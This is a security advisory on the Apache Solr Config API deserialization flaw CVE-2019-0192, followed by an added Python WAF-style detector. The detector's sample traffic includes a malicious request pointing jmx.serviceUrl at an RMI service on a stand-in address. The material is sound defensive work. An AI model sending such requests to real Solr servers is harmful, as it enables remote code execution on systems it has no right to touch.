On March 7, 2019, Alibaba Cloud Security emergency response center detected a Solr security bulletin issued by Apache. An attacker can call the Config API and modify the jmx.serviceUrl attribute so that it points to a malicious RMI service; Solr then deserializes untrusted data from that service, which results in a remote code execution (RCE) vulnerability in Apache Solr.

CVE ID

CVE-2019-0192

Vulnerability name

Deserialization RCE vulnerability in Apache Solr

Vulnerability description

The Config API allows the jmx.serviceUrl attribute to be configured by using an HTTP POST request. This attribute controls the JMX server that Apache Solr connects to. Attackers can point the attribute to a malicious RMI server and take advantage of the unsafe deserialization in Solr to trigger RCE.

Affected versions

  • Apache Solr 5.00 to 5.5.5
  • Apache Solr 6.00 to 6.6.5

Solution

  • Upgrade your Apache Solr to 7.0 or later.
  • Disable the Config API by configuring disable.configEdit=true.
  • Ensure that only trusted traffic is allowed to access the Solr server at the network layer.

If you cannot resolve the issue by using the first two solutions, recompile Solr by using the official patch.

Protection recommendations

If you do not want to upgrade Solr to resolve this vulnerability, we recommend that you use the custom protection policy feature provided by WAF to protect your business.

You can use the custom protection policy feature to block POST requests whose JSON body contains specific strings, such as service:jmx:rmi. This also prevents the RCE attack described above.
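As an added example that is not part of the original advisory or of any Alibaba Cloud or Apache code, the following Python models the WAF rule described above as detection logic: it inspects captured HTTP requests, flags POST bodies that contain the service:jmx:rmi marker, and additionally walks the JSON body for any jmx.serviceUrl key, so that the attribute is caught even when it is nested inside a Config API command. The request class, the sample requests and the RMI URL (a TEST-NET address) are constructed for illustration; the set-property command name reflects the Config API syntax for setting a property and is an assumption about how such a request would look.

```python
"""Detection logic for Config API requests that set jmx.serviceUrl (CVE-2019-0192).

Added example, not code from the advisory. Models the WAF rule from the page:
block POST requests whose body contains "service:jmx:rmi" or sets jmx.serviceUrl.
All request samples below are constructed for illustration.
"""
import json
from dataclasses import dataclass
from typing import Any, Iterator, List, Tuple

# Substring the advisory recommends restricting in a custom WAF rule.
RMI_URL_MARKER = "service:jmx:rmi"
# Config API attribute named in the advisory.
JMX_PROPERTY = "jmx.serviceUrl"


@dataclass
class HttpRequest:
    """Minimal model of a captured request (constructed for this example)."""
    method: str
    path: str
    body: str


def _walk(node: Any, key_path: str = "$") -> Iterator[Tuple[str, Any]]:
    """Yield (json_path, value) for every leaf of a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{key_path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{key_path}[{index}]")
    else:
        yield key_path, node


def inspect_request(req: HttpRequest) -> List[str]:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings: List[str] = []
    if req.method.upper() != "POST":
        return findings  # the advisory's rule targets POST bodies only
    # Raw substring check first: this also covers bodies that are not valid JSON.
    if RMI_URL_MARKER in req.body:
        findings.append(f"body contains {RMI_URL_MARKER!r}")
    # Structured check: any key named jmx.serviceUrl anywhere in the JSON body,
    # regardless of the value it is set to.
    try:
        document = json.loads(req.body)
    except ValueError:
        return findings
    for path, value in _walk(document):
        if path.endswith("." + JMX_PROPERTY):
            findings.append(f"sets {JMX_PROPERTY} at {path} -> {value!r}")
    return findings


def flagged_requests(requests: List[HttpRequest]) -> List[HttpRequest]:
    """Filter a batch of requests down to the ones the rule would block."""
    return [req for req in requests if inspect_request(req)]


# Constructed sample traffic: one Config API request that points jmx.serviceUrl at an
# RMI service on a TEST-NET address, one benign Config API request, one GET, and one
# non-JSON body that still carries the marker.
SAMPLE_REQUESTS = [
    HttpRequest("POST", "/solr/mycore/config", json.dumps({
        "set-property": {JMX_PROPERTY: "service:jmx:rmi:///jndi/rmi://203.0.113.5:1099/jmxrmi"}
    })),
    HttpRequest("POST", "/solr/mycore/config", json.dumps({
        "set-property": {"updateHandler.autoCommit.maxTime": 15000}
    })),
    HttpRequest("GET", "/solr/mycore/config", ""),
    HttpRequest("POST", "/solr/mycore/update", "plain text with service:jmx:rmi inside"),
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict = inspect_request(req)
        print(req.method, req.path, "->", "BLOCK" if verdict else "allow", verdict)
```

The substring check alone reproduces the WAF rule from the page; the JSON walk is the extra check a defender would want, because it catches a jmx.serviceUrl assignment whose value uses a different URL scheme than the one string the rule looks for.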